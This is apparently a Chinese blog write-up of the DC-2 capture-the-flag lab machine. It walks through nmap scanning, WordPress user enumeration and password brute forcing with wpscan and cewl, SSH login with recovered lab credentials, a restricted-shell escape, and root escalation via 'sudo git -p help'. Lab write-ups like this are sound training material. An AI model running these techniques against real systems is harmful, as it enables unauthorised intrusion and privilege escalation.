DC-2靶机渗透

实验环境

  1. Vmware workstation
  2. kali2020
  3. DC-2
  4. DC-2靶机网卡和kali是一样的
  5. kali 的ip地址:192.168.6.129

主机发现

 第一种方法:使用VMware去查看DC-2靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。

nmap -sP 192.168.6.0/24

 

 发现靶机IP地址为:192.168.6.132

信息收集

端口扫描

命令1:nmap -A -T4 -p- 192.168.6.132
命令2:nmap -sV 192.168.6.132

 

 开放了80和7744端口

访问一下,发现无法访问

修改攻击机的hosts文件,将以下内容写入

192.168.6.132 DC-2

 

 

 

 

 发现还是不让我访问,我就修改了Windows下的hosts

 

 

 然后就能访问了

 

 

发现flag1

 

 有关键字cewl,字面意思大概就是要爆破出用户名和密码了

查看指纹信息,知道是wordpressCMS

 

利用wpscan扫一下用户名

wpscan --url http://dc-2/ -e u

 

 将用户名存到文件

使用cewl生成密码

cewl -w pass.txt http://dc-2

 

 

攻击

爆破

wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force

出来了

 

 后台地址是在首页地址后加wp-login.php

 

用jerry登录发现flag2,tom页面没发现什么

 

 

 

尝试ssh远程登录

我们尝试用tom用户进行登录ssh服务,密码:parturient
用户:jerry,密码:adipiscing
命令:ssh tom@192.168.6.132 -p 7744

 

输入命令,发现受rbash的限

 

 

突破rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash

 

使用并添加环境变量

export PATH=$PATH:/bin/

 

 他说在Jerry里,那我们切换

 

 有点白痴,居然cd /了

说不是最终的flag,提示git

 

提权

sudo git -p help

!/bin/bash

即可登录root用户

 

 去根目录找

 

 

结束。

 

posted @ 2021-02-10 12:04  夜布多  阅读(242)  评论(0编辑  收藏  举报